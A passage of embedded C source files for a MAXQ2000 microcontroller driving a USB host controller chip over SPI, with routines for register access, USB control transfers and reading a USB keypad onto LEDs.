wreg(rHIEN,bmCONNIRQ);
} // end if( CURRENT != NEXT )
// add a test to determine...
// if(my_device == hub) status = 3;
// No device, restart loop
if( my_device == NULL ) continue;
////////// SERVICE THE DEVICE HERE /////////////////////////////////////
Read_Keypad();
// dum=rreg(rHRSL);
// result = CONNECT;
////////////////////////////////////////////////////////////////////////
} // end while(1)
/////////////////////////////////////////////////////
} // End of main(void)
void Read_Keypad(void) // constantly read the keypad, return if the connect
{ // state changes
static BYTE HR, rxnum, newkey, temp, i;
static BYTE KB_data[8];
wreg(rHCTL,bmRCVTOG0); // very first data toggle should be DATA0
while( !(FLAG & bmCONNIRQ) )
{
waitframes(10);
wreg(rHXFR,0x01); // send an IN token to EP1 (OUTNIN=0)
HR = Wait_for_HIRQ(bmHXFRDNIRQ); // this also clears the IRQ bit
switch(HR)
{
case hrNAK:
L8_ON
break; // do nothing
case hrSUCCESS: // get the KB packet
rxnum = rreg(rRCVBC);
TRIG_HI // scope pulse brackets the 8-byte read
readbytes(rRCVFIFO,rxnum,KB_data); // read "rxnum" bytes from the RCVFIFO
// wreg(rHIRQ,bmRCVDAVIRQ); // re-arm the endpont and SWITCH THE BUFFERS
/* for(i = 0; i<rxnum;i++)
{
temp = rreg(rRCVFIFO);
if(i==2) KB_data = temp;
}
*/
TRIG_LO
newkey = *KB_data; // keycode is in the third byte
if(newkey == 0) // turn off the LEDS when keys are up
PO0=0; // (comment out this test to latch keys in LEDS)
else if (newkey >= 0x59 && newkey <= 0x62) // 89 is 1-key, 98 is 0-key
PO0 = newkey - 0x58; // show it in the LEDS (0 shows as 0x0A)
break;
default: // any other completion code is an error
// PO0=0xE7; // all bar LEDS on
break;
// while(1); // hang here and examine error code
} // end switch(HR)
} // end while()
}
#endif
<file_sep>/My Code/interface.c
// interface.c
// SPI specific to the MAXQ board implementation
//
//
#ifndef INTERFACE_C
#define INTERFACE_C
#include <intrinsics.h> // MAXQ2000 specific stuff
#include <iomaxq200x.h> // ditto
#include "..\interface.h"
#include "RT53reg.h"
#define MSB(word) (BYTE)(((WORD)(word) >> 8) & 0xff)
#define LSB(word) (BYTE)((WORD)(word) & 0xff)
#define CS_HI PO5 |= 0x10;
#define CS_LO PO5 &= ~0x10;
#define SCK_HI PO5 |= 0x40; // PO6
#define SCK_LO PO5 &=~0x40;
#define DRIVE PD5 |= 0x20; // set direction to 1 (out)
#define FLOAT PD5 &=~0x20;
#define TRIG_HI PO7 = 0x01; // MAXQ P70
#define TRIG_LO PO7 = 0x00;
// Functions
void update_lites(void) // Read button states from both IOPINS regs, copy to lights in same reg
{
BYTE bs;
bs = ~rreg(rGPIO); // bs=button states. complement to make the buttons active high
bs >>= 4;
wreg(rGPIO,bs);
bs = ~rreg(21);
bs >>= 4;
wreg(21,bs);
}
/*
BYTE Check_INT(void) // returns 0 if nothing pending, nonzero if something pending
{
// neg-level
// return ~PI6 & 0x01; // Return complement of level on P60 pin
// pos or neg edge (initialization sets edge polarity)
if(EIF1_bit.IE12) // Test the IRQ Flag
{
EIF1_bit.IE12 = 0; // It's set--clear it
return(1); // show an IRQ is active
}
else return(0); // flag=0: no IRQ active
}
*/
/////////////////////////////////////////////////////////////////
/////////////////////// SPI Functions ///////////////////////////
/////////////////////////////////////////////////////////////////
void SPI_Init(void)
{
// MAXQ2000 SPI port
// CKCN = 0x00; // system clock divisor is 1
PD5 |= 0x070; // Set SPI output pins (CS, SCLK, DOUT) as output.
PD5 &= ~0x080; // Set SPI input pin (DIN) as input.
//
// SPICK = 0x00; // fastest SPI clock--div by 2
SPICK = 0x02; // fastest SPI clock--div by 2
SPICF = 0x00; // mode(0,0), 8 bit data
SPICN_bit.MSTM = 1; // Set Q2000 as the master.
SPICN_bit.SPIEN = 1; // Enable SPI
SPICF_bit.CHR = 1; // Set SPI to 16-bit mode.
CS_HI // CS# high
}
// SPI Send Byte Function
// Purpose: Send one BYTE of data to the RT99 via the SPI interface and wait for xfer to complete.
// Precondition: The Q2000 must be interface with the RT99 via the SPI pins and the
// reg variable contains any BYTE data to be written to the RT99.
// Postcondition: The argument value is written to the SPI port and the proper amount of delay is
// allowed for the transfer. Invalid returned data is discarded.
//void SENDBYTE(int x){ SPIB = x; while(SPICN_bit.STBY); SPIB; }
__monitor WORD sendBYTE(WORD x )
{
// SPICF_bit.CHR = 1; // Set SPI to 16-bit mode.
SPIB = x; // Load the data to send
while(SPICN_bit.STBY); // Loop until the data has been sent.
//SPIB;
SPICN_bit.SPIC = 0; // Clear the SPI tansfer complete flag.
return SPIB;
}
// SPI Read Register Function
// Purpose: Takes a BYTE value as an argument that represents a RT99 register address
// and allows proper delay for the data to be returned from the RT99 in that register address.
// Precondition: The Q2000 must be interface with the RT99 via the SPI pins and the
// reg variable must contain a hex value of a valid RT99 register address.
// Postcondition: SPIB contains the data returned from the RT99.
__monitor WORD rreg(WORD reg)
{
SPICF_bit.CHR = 1; // Set SPI to 16-bit mode.
CS_LO
sendBYTE( 0x0000 | (reg<<11) ); // bit1 0=read, bit7-bit3 register address value. [12 is filler]
CS_HI
return SPIB;
}
// SPI Write Register Function
// Purpose: Takes a WORD value as an argument that represents a RT99 register address
// and one BYTE of data and writes a BYTE value to the RT99 register address.
// Precondition: The Q2000 must be interface with the RT99 via the SPI pins and the
// reg variable must contain a hex value of a valid RT99 register address.
// Postcondition: The RT99 register has been written with the data BYTE.
__monitor void wreg(WORD reg, BYTE dat)
{
SPICF_bit.CHR = 1; // Set SPI to 16-bit mode.
CS_LO
// Combine write command, register and data and send.
sendBYTE( 0x0200 | (reg<<11) | (WORD)dat );
CS_HI
}
__monitor void readbytes(BYTE reg, BYTE N, BYTE *p)
{
static BYTE j;
SPICF_bit.CHR = 0; // Set SPI to 8-bit mode.
CS_LO
SPIB = reg<<3; // write bit b1=0 to command a read operation
while(SPICN_bit.STBY); // loop if data still being sent
j = SPIB; // NECESSARY TO RE-ENABLE THE INPUT BUFFER in BYTE MODE
for(j=0; j<N; j++)
{
SPIB = 0x00; // dummy value to get the next read byte
while(SPICN_bit.STBY); // loop if data still being received
*p = SPIB; // store it in the data array
p++; // bump the pointer
}
CS_HI
// SPICN_bit.SPIC = 0; // Clear the SPI tansfer complete flag.
}
__monitor void ReadBytes(BYTE reg, BYTE N, BYTE *p)
{
static BYTE j;
SPICF_bit.CHR = 0; // Set SPI to 8-bit mode.
CS_LO
SPIB = reg<<3; // write bit b1=0 to command a read operation
while(SPICN_bit.STBY); // loop if data still being sent
SPIB; // NECESSARY TO RE-ENABLE THE INPUT BUFFER in BYTE MODE
for(j=0; j<N; j++)
{
SPIB = 0x00; // dummy value to get the next read byte
while(SPICN_bit.STBY); // loop if data still being received
*p = SPIB; // store it in the data array
p++; // bump the pointer
}
SPICN_bit.SPIC = 0; // Clear the SPI tansfer complete flag.
CS_HI
}
__monitor void WriteBytes(BYTE reg, BYTE N, const BYTE *p)
{
BYTE j, wd;
SPICF_bit.CHR = 0; // Set SPI to 8-bit mode.
CS_LO
SPIB = (reg<<3)+2; // write bit b1=1 to command a write operation
while(SPICN_bit.STBY); // loop if data still being sent
for(j=0; j<N; j++)
{
wd = *p; // write the array value
SPIB = wd;
while(SPICN_bit.STBY); // loop if data still being received
p++; // bump the pointer
}
CS_HI
}
__monitor void writebytes(BYTE reg, BYTE N, BYTE *p)
{
static BYTE j,wd;
SPICF_bit.CHR = 0; // Set SPI to 8-bit mode.
CS_LO
SPIB = (reg<<3)+2; // write bit b1=1 to command a write operation
while(SPICN_bit.STBY); // loop if data still being sent
for(j=0; j<N; j++)
{
wd = *p; // write the array value
SPIB = wd;
while(SPICN_bit.STBY); // loop if data still being received
p++; // bump the pointer
}
CS_HI
}
/*
// Read a register, return its value.
BYTE rreg(BYTE reg)
{
BYTE dum;
CS_LO
SPIB = reg<<3; // reg number w. dir=0 (IN)
while(SPICN_bit.STBY); // loop if data still being sent
dum = SPIB; // NECESSARY TO RE-ENABLE THE INPUT BUFFER in BYTE MODE
SPIB=0x12; // data is don't care, we're clocking in MISO bits
while(SPICN_bit.STBY); // loop if data still being sent
CS_HI
return(SPIB);
}
*/
/*
void wreg(BYTE reg, BYTE dat)
{
CS_LO // Set CS# low
SPIB = (reg<<3)+2; // send the register number with the DIR bit (b1) set to WRITE
while(SPICN_bit.STBY); // loop if data still being sent
SPIB = dat; // send the data
while(SPICN_bit.STBY); // loop if data still being sent
CS_HI // set CS# high
// SPICN_bit.SPIC = 0; // Clear the SPI tansfer complete flag.
}
*/
#endif // INTERFACE_C
<file_sep>/My Code/read_bytes/read_bytes.c
//
// File........: simple_test.c
// Authors.....:
// Description.:
//
//
// Conditions:
// IFACE: SPI
//
// Date........:
//
// The proper interface can be found in interface.c
#ifndef simple_test_C
#define simple_test_C
// Host or peripheral? - define only one.
#define HST
//#define PER
// Low or Full Speed? - define only one.
//#define HS
#define LS
// Which interface? - define only one.
#define IFACE_SPI
//#define IFACE_I2C
#define TEMP
#include <stdlib.h>
#include <stdio.h>
#include <intrinsics.h> // MAXQ2000 specific stuff
#include <iomaxq200x.h> // MAXQ2000 specific stuff
#include "RT53reg.h" // RT99 Registers and bits
//#include "..\interface.c" // SPI/I2C Implementation
//#include "..\usb.c" // USB Implementation
///// Declare GLOBALS Here ///////////////////////
__monitor void readbytes(BYTE reg, BYTE N, BYTE *p)
{
static BYTE j,k;
static BYTE p2[8];
SPICF_bit.CHR = 0; // Set SPI to 8-bit mode.
CS_LO
SPIB = reg<<3; // write bit b1=0 to command a read operation
while(SPICN_bit.STBY); // loop if data still being sent
k = SPIB; // NECESSARY TO RE-ENABLE THE INPUT BUFFER in BYTE MODE
for(j=0; j<N; j++)
{
SPIB = 0x00; // dummy value to get the next read byte
while(SPICN_bit.STBY); // loop if data still being received
p2[j] = *p = SPIB; // store it in the data array
p++; // bump the pointer
}
CS_HI
// SPICN_bit.SPIC = 0; // Clear the SPI tansfer complete flag.
}
///////////////////////////////////////////////////
main()
{
///// Declare Variables Here ///////////////////////
//
int rxnum = 10;
int KB_data[8];
///////////////////////////////////////////////////
SPI_Init();
Host_Init();
// Set_Address to 4
wreg(rPERADDR,0x00); // send to address 0
waitframes(10);
WriteBytes(rSUDFIFO,8,address); // Load the SUDFIFO with Set_Address=4 request
HR1 = CTL_WRITE(); // this function returns only after completion
// Set_Config to 1
wreg(rPERADDR,0x04); // address is now 4
WriteBytes(rSUDFIFO,8,config); // Load the SUDFIFO with Set_Config=1 request
HR2 = CTL_WRITE();
// Send the "set_idle" request
WriteBytes(rSUDFIFO,8,idle); // Load the SUDFIFO with Set_Idle request
HR3 = CTL_WRITE();
///// Your Code Here //////////////////////////////
while(1)
{
readbytes(rRCVFIFO,rxnum,KB_data); // read "rxnum" bytes from the RCVFIFO
}
////////////////////////////////////////////////////////////////////////
/////////////////////////////////////////////////////
} // End of main(void)
#endif
<file_sep>/My Code/usb.c
#ifndef USB_C
#define USB_C
#include <intrinsics.h> // MAXQ2000 specific stuff
#include <iomaxq200x.h> // ditto
#include "..\usb.h"
#include "..\interface.c"
#include "RT53reg.h"
static DEVICE *device = NULL;
// Mode register macros
#define HOST_LS_THRUHUB wreg(rMODE,0xCF); // DPPD,DMPD,KAENAB,HUBRPE,LOWSPEED,HOST
#define HOST_LS wreg(rMODE,0xCB); // as above but HUBPRE=0
#define HOST_FS wreg(rMODE,0xC9); // as HOST_LS but LOWSPEED=0
//
#define SUSPEND_INT_ON wreg(rUSBIEN,(rreg(rUSBIEN) | bmSUSPEND));
#define SUSPEND_INT_OFF wreg(rUSBIEN,(rreg(rUSBIEN) & !bmSUSPEND));
#define BUSACT_INT_ON wreg(rUSBIEN,(rreg(rUSBIEN) | bmBUSACT));
#define BUSACT_INT_OFF wreg(rUSBIEN,(rreg(rUSBIEN) & !bmBUSACT));
#define SETBIT(reg,val) wreg(reg,(rreg(reg)|val));
#define CLRBIT(reg,val) wreg(reg,(rreg(reg)&~val));
//
#define STALL_EP0 wreg(9,0x23); // Set all three EP0 stall bits--data stage IN/OUT and status stage
void Host_Init( void )
{
// MAXQ2000 SPI port as a master
SPI_Init();
// disable interrupt pin
wreg(rCPUCTL, 0x00);
// disable all interrupt
wreg(rUSBIEN,0x00);
wreg(rGPINIEN,0x00);
wreg( rHIEN, 0x00 );
// chip reset
// Reset_MAX(1000); // RT53: Reset USB bus [SPI port must be set up before this will work]
wreg(rUSBCTL,0x20);
timeDELAY(500); // a delay
wreg(rUSBCTL,0x00); // remove the reset
timeDELAY(2000); // a delay
// RT53: INTLEVEL=0, POSINT=1 for pos edge interrupt pin
wreg(rPINCTL,(bmFDUPSPI));
// Set up the host
wreg(rMODE,(bmDPPULLDN|bmDMPULLDN|bmSOFKAENAB|bmLOWSPEED|bmHOST)); // low speed
//wreg(rMODE,(bmDPPULLDN|bmDMPULLDN|bmSOFKAENAB|bmHOST)); // full speed
// LED RELATED MAXQ2000
PD0=0xFF; // MAXQ: Set port 0 to outputs
PO0 = rreg(rRevision); // MAXQ:
PD7 = 0x01; // MAXQ: P70 is scope TRIG signal
// INTERRUPT RELATED MAXQ2000
// MAX3410E INT pin is tied to MAXQ2000 P60: make it an input
PD6 &= ~0x01; // MAXQ: PD6.0=0 (turn off output)
EIES1_bit.IT12 = 1; // MAXQ: 0=pos edge triggered IRQ
EIE1_bit.EX12 = 1; // MAXQ: Enable Int12
IMR |= 0x02; // MAXQ: enable interrupts for module 1
// MAXQ: enable interrupts
__enable_interrupt();
// Enable interrupt pin
wreg(rCPUCTL, bmIE);
}
/*
int Connect_Device( DEVICE * my_device )
{
static int status;
if ( CURRENT != NEXT )
{
CURRENT = NEXT;
switch ( CURRENT )
{
case 0x00 : // SE0 - EOP or disconnect
if ( my_device != NULL )
Close_Device( my_device );
// free(my_device);
// my_device = NULL;
// status = 0;
break;
case bmKSTATUS : // K STATE
///////////////////////////////////////////////////
my_device = Open_Device();
if ( my_device == NULL )
{
printf( "Failed to create the device!\n" );
exit( 1 );
}
// this_device = my_device;
// Configure_Device( my_device, addr4, conf1, idle );
///////////////////////////////////////////////////
// status = 1;
break;
case bmJSTATUS : // J STATE
// PO0 = 0x0C; // MAXQ:
///////////////////////////////////////////////////
my_device = Open_Device();
if ( my_device == NULL )
{
printf( "Failed to create the device!\n" );
exit( 1 );
}
// Configure_Device( my_device, addr4, conf1, idle );
// this_device = my_device;
///////////////////////////////////////////////////
status = 2;
break;
default : // error
break;
} // end switch ( CURRENT )
wreg(rHIEN,bmCONNIRQ);
} // end if( CURRENT != NEXT )
// add a test to determine...
// if(my_device == hub) status = 3;
return status;
}
*/
// PURPOSE: This function creates a DEVICE object to store information related to
// the device currently at address 0 on the USB bus.
// PRECONDITIONS: This device was just plugged into the USB bus.
// POSTCONDITIONS: This device will be in DEFAULT mode, the Device and Interface
// descriptors will be store in the fields of the DEVICE object "my_device."
// This function will initialize the global "device" pointer to be used by the ISR
// while this device is at address zero.
// ARGUMENTS: None.
// RETURNED: Pointer to the device object.
DEVICE *Open_Device( void )
{
DEVICE *my_device;
my_device = malloc( sizeof( DEVICE ));
if ( my_device == NULL)
return( NULL );
device = my_device;
timeDELAY(5000);
// Reset the USB device to default state
Bus_Reset();
// waitframes(8);
// Bus_Reset();
//
waitframes(10);
//Standard_Request(SR_GET_DESCRIPTOR, GD_DEVICE, device);
//Standard_Request(SR_GET_DESCRIPTOR, GD_CONFIGURATION, device);
//Standard_Request(SR_GET_DESCRIPTOR, GD_INTERFACE, device);
return( my_device );
}
// PURPOSE:
// PRECONDITIONS: The USB device is in the default state and the host is fully
// configured. The descriptors have been read from the USB device and stored in the
// appropriate fields in the my_device object.
// POSTCONDITIONS: The USB device has been assigned a unique address. Based upon the
// configuration data read in the Open_Device() function and stored in my_device, the
// device has been configured.
// ARGUMENTS:
// RETURNS:
void Configure_Device( DEVICE *my_device,
const SUD address,
const SUD config,
const SUD idle)
{
static BYTE Set_Addr4[8] = {0x00,0x05,0x04,0x00,0x00,0x00,0x00,0x00};
static BYTE Set_Config1[8] = {0x00,0x09,0x01,0x00,0x00,0x00,0x00,0x00};
static BYTE Set_Idle[8] = {0x21,0x0A,0x00,0x00,0x00,0x00,0x00,0x00};
//my_device->address = address;
//my_device->config = config;
//my_device->idle = idle;
timeDELAY(5000);
// Set_Address to 4
wreg(rPERADDR,0x00); // send to address 0
waitframes(10);
WriteBytes(rSUDFIFO,8,Set_Addr4); // Load the SUDFIFO with Set_Address=4 request
HR1 = CTL_WRITE(); // this function returns only after completion
// Set_Config to 1
wreg(rPERADDR,0x04); // address is now 4
WriteBytes(rSUDFIFO,8,Set_Config1); // Load the SUDFIFO with Set_Config=1 request
HR2 = CTL_WRITE();
// Send the "set_idle" request
WriteBytes(rSUDFIFO,8,Set_Idle); // Load the SUDFIFO with Set_Idle request
HR3 = CTL_WRITE();
// Check here to see if the device is a hub; if so, configure the hub and return 1
timeDELAY(100);
}
// Host
// PURPOSE:
// PRECONDITIONS:
// POSTCONDITIONS:
// ARGUMENTS:
// RETURNS:
void Configure_Hub( DEVICE *my_device,
const SUD address,
const SUD config,
const SUD idle)
{
//
waitframes(4);
// Set_Address to 4
wreg(rPERADDR,0x00); // send to address 0
waitframes(10);
WriteBytes(rSUDFIFO,8,address); // Load the SUDFIFO with Set_Address=4 request
HR1 = CTL_WRITE(); // this function returns only after completion
// Set_Config to 1
wreg(rPERADDR,0x04); // address is now 4
WriteBytes(rSUDFIFO,8,config); // Load the SUDFIFO with Set_Config=1 request
HR2 = CTL_WRITE();
// Send the "set_idle" request
WriteBytes(rSUDFIFO,8,idle); // Load the SUDFIFO with Set_Idle request
HR3 = CTL_WRITE();
// Check here to see if the device is a hub; if so, configure the hub and return 1
}
// Host
// PURPOSE: This function destroys the DEVICE object and frees the memory used by
// a device that was unplugged from the USB bus.
// PRECONDITIONS: A DEVICE object existed containing the data for a device.
// POSTCONDITION: The memory allocated for the device is freed and the host is
// reconfigured to pre-connect state and prepared for another device to be connected.
// ARGUMENTS: Apointer to the the DEVICE object of the disconnected device.
// RETURNS: None.
void Close_Device( DEVICE *my_device )
{
DEVICE *Tmp;
Tmp = my_device;
if ( my_device != NULL )
my_device = NULL;
free(Tmp);
}
// PURPOSE:
// PRECONDITIONS:
// POSTCONDITIONS:
// ARGUMENTS:
// RETURNS:
void Bus_Reset(void)
{
static BYTE temp;
temp = rreg( rHIEN );
wreg( rHIEN, bmBUSEVENTIE | temp ); // enable the reset done irq
wreg( rHCTL, bmBUSRST ); // initiate the 50 msec bus reset
Wait_for_HIRQ( bmBUSEVENTIRQ ); // wait for, and then clear this interrupt
wreg( rHIEN, temp ); // restore ints
}
// PURPOSE:
// PRECONDITIONS:
// POSTCONDITIONS:
// ARGUMENTS:
// RETURNS:
void Bus_Resume(void)
{
static BYTE temp;
temp = rreg( rHIEN );
wreg( rHIEN, bmBUSEVENTIE | temp ); // enable the reset done irq
wreg(rHCTL,bmBUSRSM); // initiate the 20 msec bus resume
Wait_for_HIRQ(bmBUSEVENTIRQ); // wait for, and then clear this interrupt
wreg( rHIEN, temp ); // restore ints
}
// PURPOSE: This resets the MAX3420E/MAX3421E
// PRECONDITIONS:
// POSTCONDITIONS:
// ARGUMENTS:
// RETURNS:
void Reset_MAX(int time) // applies to MAX3420E or MAX3421E
{
wreg( rUSBCTL, 0x20 ); // chip reset
timeDELAY( 500 ); // a delay
wreg( rUSBCTL, 0x00 ); // remove the reset
timeDELAY( 2000 ); // a delay
}
// Host
// PURPOSE:
// PRECONDITIONS:
// POSTCONDITIONS:
// ARGUMENTS:
// RETURNS:
DEVICE *Standard_Request(BYTE request_code, BYTE descriptor_type, DEVICE * my_device)
{
switch ( request_code )
{
case SR_GET_STATUS:
// Get_Status(my_device);
break;
case SR_CLEAR_FEATURE:
// Clear_Feature(my_device);
break;
case SR_RESERVED:
break;
case SR_SET_FEATURE:
// Set_Feature(my_device);
break;
case SR_SET_ADDRESS:
// Set_Address(my_device);
break;
case SR_GET_DESCRIPTOR:
// Get_Descriptor(descriptor_type, my_device);
break;
case SR_SET_DESCRIPTOR:
// Set_Descriptor(descriptor_type, my_device);
break;
case SR_GET_CONFIGURATION:
// Get_Configuration(my_device);
break;
case SR_SET_CONFIGURATION:
// Set_Configuration(my_device);
break;
case SR_GET_INTERFACE:
// Get_Interface(my_device);
break;
case SR_SET_INTERFACE:
// Set_Interface(my_device);
break;
default:
return NULL;
}
return my_device;
}
// PURPOSE:
// PRECONDITIONS:
// POSTCONDITIONS:
// ARGUMENTS:
// RETURNS:
void Get_Configuration(DEVICE *my_device)
{
}
// Host, Address/Configured
// PURPOSE:
// PRECONDITIONS:
// POSTCONDITIONS:
// ARGUMENTS:
// RETURNS:
void Set_Configuration(DEVICE *my_device)
{
}
// Host, Default/Address
// PURPOSE:
// PRECONDITIONS:
// POSTCONDITIONS:
// ARGUMENTS:
// RETURNS:
BYTE Set_Address(BYTE addr)
{
wreg(rSUDFIFO,0x00);
wreg(rSUDFIFO,0x05);
wreg(rSUDFIFO,addr);
wreg(rSUDFIFO,0x00);
wreg(rSUDFIFO,0x00);
wreg(rSUDFIFO,0x00);
wreg(rSUDFIFO,0x00);
wreg(rSUDFIFO,0x00);
wreg(rPERADDR,0x00); // send to address 0
return CTL_WRITE(); // return its error code
}
// Host, Address/Configured
// PURPOSE:
// PRECONDITIONS:
// POSTCONDITIONS:
// ARGUMENTS:
// RETURNS:
BYTE Get_Device_Status(void)
{
wreg(rSUDFIFO,0x80); // 10000000 OUT, STD REQ, to Device
wreg(rSUDFIFO,0x00); // 0 is Get_Status
wreg(rSUDFIFO,0x00);
wreg(rSUDFIFO,0x00);
wreg(rSUDFIFO,0x00);
wreg(rSUDFIFO,0x00);
wreg(rSUDFIFO,0x02); // ask for two bytes
wreg(rSUDFIFO,0x00);
return CTL_READ();
}
// Host
// PURPOSE:
// HUB: get hub/port status. If port=0, returns hub status.
// PeriphBytes[0] = StatusL
// PeriphBytes = StatusH
// PeriphBytes = PortChangeL. NOTE: PortChangeH is all zeros so we skip it.
// PRECONDITIONS:
// POSTCONDITIONS:
// ARGUMENTS:
// RETURNS: Result code for the CTL-RD transfer (0=no errors)
BYTE H_GetStat(BYTE port)
{
wreg(rSUDFIFO,0xA3); // 10100011 IN, class, "other"
wreg(rSUDFIFO,0x00);
wreg(rSUDFIFO,0x00);
wreg(rSUDFIFO,0x00);
wreg(rSUDFIFO,port);
wreg(rSUDFIFO,0x00);
wreg(rSUDFIFO,0x04);
wreg(rSUDFIFO,0x00);
return CTL_READ();
}
// Host
// PURPOSE:
// PRECONDITIONS:
// POSTCONDITIONS:
// ARGUMENTS:
// RETURNS:
BYTE HubPort_Feature(BYTE setnotclr,BYTE feat,BYTE port)
{
wreg(rSUDFIFO,0x23);
wreg(rSUDFIFO, setnotclr ? 0x03:0x01); // Set_Feature or Clear_Feature
wreg(rSUDFIFO,feat);
wreg(rSUDFIFO,0x00);
wreg(rSUDFIFO,port); // wIndexL
wreg(rSUDFIFO,0x00);
wreg(rSUDFIFO,0x00);
wreg(rSUDFIFO,0x00);
return CTL_WRITE();
}
// Host
// PURPOSE:
// PRECONDITIONS:
// POSTCONDITIONS:
// ARGUMENTS:
// RETURNS:
// Set_Idle[8] = {0x21,0x0A,0x00,0x00,0x00,0x00,0x00,0x00};
BYTE Set_Idle(BYTE iface, BYTE duration, BYTE reportID)
{
wreg(rSUDFIFO,0x21); // bmRequestType=Output, class request, directed to interface
wreg(rSUDFIFO,0x0A); // SET_IDLE
wreg(rSUDFIFO,reportID);// wValueL
wreg(rSUDFIFO,duration);// wValueH
wreg(rSUDFIFO,0x00); // wIndexL
wreg(rSUDFIFO,iface); // wIndexH
wreg(rSUDFIFO,0x0); // wLengthL
wreg(rSUDFIFO,0x0); // wLengthH
return CTL_WRITE();
}
// Host, Address/Configured
// PURPOSE:
// PRECONDITIONS:
// POSTCONDITIONS:
// ARGUMENTS:
// RETURNS:
BYTE Set_Config(BYTE cfgval)
{
wreg(rSUDFIFO,0x00); // bmRequestType=Output, std request, directed to device
wreg(rSUDFIFO,0x09); // SET_CONFIG
wreg(rSUDFIFO,cfgval); // wValueL
wreg(rSUDFIFO,0x00); // wValueH
wreg(rSUDFIFO,0x00); // wIndexL
wreg(rSUDFIFO,0x00); // wIndexH
wreg(rSUDFIFO,0x0); // wLengthL
wreg(rSUDFIFO,0x0); // wLengthH
return CTL_WRITE();
}
// Host, Configured
// PURPOSE:
// PRECONDITIONS:
// POSTCONDITIONS:
// ARGUMENTS:
// RETURNS:
BYTE Set_Interface(BYTE interface, BYTE altsetting)
{
wreg(rSUDFIFO,0x00); // bmRequestType=Output, std request, directed to device
wreg(rSUDFIFO,0x0B); // SET_CONFIG
wreg(rSUDFIFO,altsetting); // wValueL=alternate setting
wreg(rSUDFIFO,0x00); // wValueH=0
wreg(rSUDFIFO,interface); // wIndexL=Interface number
wreg(rSUDFIFO,0x00); // wIndexH
wreg(rSUDFIFO,0x0); // wLengthL
wreg(rSUDFIFO,0x0); // wLengthH
return CTL_WRITE();
}
// Host, Default/Address/Configured
// Get_Descriptor_Device[8] = {0x80,0x06,0x00,0x01,0x00,0x00,0x40,0x00};
// PURPOSE:
// PRECONDITIONS:
// POSTCONDITIONS:
// ARGUMENTS:
// RETURNS:
BYTE Get_Descriptor(BYTE type,WORD length)
{
wreg(rSUDFIFO,0x80); // bmRequestType=Input, Std request, directed to device
wreg(rSUDFIFO,0x06); // GET_DESCRIPTOR
wreg(rSUDFIFO,0x00); // wValueL = descriptor index
wreg(rSUDFIFO,type); // wValueH = descriptor type
wreg(rSUDFIFO,0x00); // wIndexL
wreg(rSUDFIFO,0x00); // wIndexH
wreg(rSUDFIFO,MSB(length)); // wLengthL
wreg(rSUDFIFO,LSB(length)); // wLengthH
return CTL_READ();
}
//Host
// PURPOSE: // **** CONTROL-Write transfer with no OUT data stage. **** //
// 1. This function sends a SETUP token to fnaddr, EP=0, then a DATA0 PID with the 8 setup bytes in SUDFIFO.
// If the transfer error code is nonzero, the function exits with the return value of 1x, where x
// is the RT53 error code.
// 2. If no error, sends an IN handshake to fnaddr, EP=0. By setting the IN and HS bits, the SIE
// automatically checks for the correct peripheral response--an empty DATA1 packet--and ACKS it.
// If the transfer error code is nonzero, the function exits with the return value of 2x, where x
// is the RT53 error code.
// PRECONDITIONS: SUDFIFO pre-loaded with the 8 setup bytes, and PERADDR with the address.
// POSTCONDITIONS:
// ARGUMENTS:
// RETURNS: HSRLT, 0 = Success
BYTE CTL_WRITE(void) // call with SUDFIDO loaded with 8 bytes and PERADDR=device address
{
static BYTE errorcode;
// Phase 1. Send the SETUP token and 8 setup bytes. Device should immediately ACK.
do
{
wreg(rHXFR,tokSETUP);
errorcode = Wait_for_HIRQ(bmHXFRDNIRQ);
}
while(errorcode);
// if (errorcode)
// return 0x10 + errorcode; // it's nonzero. The 0x10 indicates first xfr phase
// Phase 2. Send IN handshakes until we get the DATA1 PID (expect NAKS)
do
{
wreg(rHXFR,bmHS); // [*** was A0, now 80h]
errorcode = Wait_for_HIRQ(bmHXFRDNIRQ);
}
while (errorcode/* == hrNAK*/); // Try again if a NAK
// if (errorcode)
// return 0x20 + errorcode; // 0x20 indicates second xfr phase
return(0); // success
}
//Host
// PURPOSE: // **** CONTROL-Read transfer **** //
// The function sends the SETUP packet, then an IN packet, then reads the IN data
// into the RCVFIFO.
// PRECONDITIONS: Before calling, load SUDFIFO with the command request.
// POSTCONDITIONS: On exit, the RCVBC reg indicates the byte count, and the IN data is in the RCVFIFO.
// ARGUMENTS: None.
// RETURNS: Returns 0x00 on success, or 0xXN where X is 0x80, 0x90, etc. & n is the 4-bit HRSL error code.
BYTE CTL_READ(void)
{
static BYTE dum, errorcode;
//BYTE dum,errorcode,xlen;
// 0. Load the SUDFIFO
//writebytes(rSUDFIFO,8,pSUD);
// 1. Send a SETUP token to addr 0, ep0, followed by a DATA0 PID and the 8 setup bytes in SUDFIFO
// Note that we don't need to initialize the DATA toggle value, the SIE always sends DATA0 for SETUPS.
//
wreg(rHIEN,bmHXFRDNIE); // enable the host transfer done interrupt
wreg(rHXFR,bmSETUP); // trigger the transfer--SIE takes care of both SETUP and DATA stages. EP=0.
errorcode = check_HRSL(); // check_HRSL() waits for HXFRDN IRQ and returns host result code
if (errorcode)
return (0x80+errorcode);
// 2. Send an IN token to addr0, ep0.
dum = rreg(rHIRQ); // 0x68 FRAME, CONN, SNDBAV
SETBIT(rHCTL,bmRCVTOG1); // expect a DATA1 packet
wreg(rHXFR,0x00); // IN token to fnaddr, EP0
errorcode = check_HRSL(); // check_HRSL() waits for any interrupt and returns host result code
if (errorcode)
return (0x90+errorcode);
// 3. Get the byte count, read EP0FIFO into PeriphBytes array
//dum = rreg(rHIRQ); // 0x6C +++ FRAME CONN SNDBAV RCVDAV
//xlen = rreg(rRCVBC); // get the byte count ??? ERROR xlen=0, not 8
//readbytes(rRCVFIFO,xlen ,PeriphBytes);
//SETBIT(rHIRQ,bmRCVDAVIRQ); // clear the IRQ (and rRCVBC register)
// 4.
wreg(rHXFR,(bmOUTNIN | bmHS)); // OUT packet as a handshake
errorcode = check_HRSL(); // check_HRSL() waits for any interrupt and returns host result code
if (errorcode)
return (0xA0+errorcode);
//
return (0); // no errors
}
// Host
// PURPOSE: To remain in a loop until the FRAMEIRQ decrements a global variable to zero.
// PRECONDITIONS: Host mode, SPI configured.
// POSTCONDITIONS: Interrupts are returned to original state.
// ARGUMENTS: int number of USB frames delay desired
// RETURNS: None.
void waitframes(int num)
{
static BYTE temp;
// Store currently enabled IRQs
temp = rreg(rHIEN);
FRAMECOUNT = 0;
while(FRAMECOUNT < num)
{
wreg(rHIEN, (bmFRAMEIE | bmCONNIRQ));
